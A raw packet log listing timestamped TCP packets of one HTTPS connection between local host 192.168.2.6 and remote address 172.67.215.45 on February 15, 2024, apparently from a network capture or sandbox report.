Feb 15, 2024 19:42:26.895473003 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.895549059 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.895735979 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.895752907 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.895787954 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.895793915 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.895837069 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.895886898 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.896580935 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.896604061 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.896647930 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.896656036 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.896680117 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.896702051 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.897324085 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.897340059 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.897377968 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.897387981 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.897411108 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.897433043 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.897849083 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.897864103 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.897898912 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.897907019 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.897931099 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.897949934 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.898366928 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.898384094 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.898428917 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.898437023 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.898475885 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.898935080 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.898951054 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.898993015 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.898998976 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.899024010 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.899044991 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.899693966 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.899713039 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.899749994 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.899758101 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.899776936 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.899797916 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.900490046 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.900505066 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.900547028 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.900554895 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.900573015 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.900594950 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.901082039 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.901101112 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.901134968 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.901140928 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.901164055 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.901185036 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.901721954 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.901740074 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.901776075 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.901782990 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.901803970 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.901827097 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.902401924 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.902420044 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.902462959 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.902472019 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.902487993 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.902508020 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.902945995 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.902961969 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.902997971 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.903004885 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.903032064 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.903052092 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.903616905 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.903631926 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.903680086 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.903686047 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.903718948 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.904243946 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.904261112 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.904294968 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.904301882 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.904324055 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.904345989 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.904938936 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.904954910 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.904993057 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.904999018 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.905026913 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.905045986 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.905663013 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.905679941 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.905718088 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.905729055 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.905747890 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.905769110 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.906289101 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.906306982 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.906354904 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.906363010 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.906388044 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.906407118 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.906939030 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.906958103 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.907042027 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.907048941 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.907090902 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.907461882 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.907480001 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.907527924 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.907532930 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.907562971 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.907583952 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.908144951 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.908162117 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.908200979 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.908205986 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.908235073 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.908256054 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.908925056 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.908942938 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.908993959 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.908998966 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.909039974 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.909576893 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.909596920 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.909637928 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.909643888 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.909668922 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.909707069 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.910439014 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.910458088 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.910496950 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.910501957 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.910526037 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.910542965 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.910912037 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.910929918 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.910978079 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.910984993 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.911019087 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.911567926 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.911586046 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.911634922 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.911639929 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.911674023 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.912276030 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.912293911 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.912338972 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.912343979 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.912374973 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.912916899 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.912936926 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.912988901 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.912995100 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.913024902 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.913528919 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.913546085 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.913580894 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.913585901 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.913609982 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.913620949 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.913975000 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.913992882 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.914031029 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.914036036 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.914057970 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.914074898 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.914251089 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.914268017 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.914299965 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.914305925 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.914328098 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.914344072 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.914794922 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.914810896 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.914859056 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.914865017 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.914899111 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.915201902 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.915220976 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.915254116 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.915258884 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.915308952 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.915333986 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.915555954 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.915572882 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.915615082 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.915621042 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.915657043 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.915914059 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.915930986 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.915982008 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.915987015 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.916028023 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.916347980 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.916366100 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.916398048 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.916403055 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.916428089 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.916440010 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.916851997 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.916870117 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.916907072 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.916912079 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.916938066 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.916955948 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.917262077 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.917280912 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.917319059 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.917325974 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.917342901 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.917361021 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.917655945 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.917675018 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.917727947 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.917735100 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.917768002 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.918051004 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.918071032 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.918107986 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.918114901 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.918148041 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.918556929 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.918576956 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.918620110 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.918625116 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.918654919 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.918880939 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.918898106 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.918936968 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.918941975 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.918972015 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.919410944 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.919426918 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.919457912 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.919464111 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.919483900 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.919498920 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.919828892 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.919847012 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.919888973 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.919894934 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.919929981 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.920301914 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.920320988 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.920368910 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.920373917 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.920408010 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.920799971 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.920818090 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.920861006 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.920872927 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.920907974 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.921365023 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.921381950 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.921420097 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.921426058 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.921446085 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.921461105 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.921876907 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.921905994 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.921938896 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.921943903 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.921966076 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.921984911 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.922133923 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.922152996 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.922182083 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.922187090 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.922208071 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.922226906 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.923083067 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.923099995 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.923137903 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.923142910 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.923176050 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.923191071 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.923527956 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.923544884 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.923592091 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.923598051 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.923628092 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.923979998 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.923995972 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.924031019 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.924036026 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.924069881 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.924087048 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.924506903 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.924523115 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.924570084 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.924575090 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.924602032 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.924617052 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.924844027 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.925203085 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.925220966 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.925273895 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.925280094 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.925358057 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.925766945 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.925784111 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.925827026 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.925832033 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.925858021 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.925882101 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.926331997 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.926348925 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.926389933 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.926395893 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.926424026 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.926445961 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.926985025 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.927000999 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.927042007 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.927047014 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.927076101 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.927098036 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.927539110 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.927556038 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.927611113 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.927618027 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.927655935 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.928145885 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.928162098 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.928215981 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.928220987 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.928255081 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.928790092 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.928805113 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.928852081 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.928858042 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.928884983 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.929371119 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.929388046 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.929429054 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.929435015 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.929464102 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.930177927 CET	443	49722	172.67.215.45	192.168.2.6
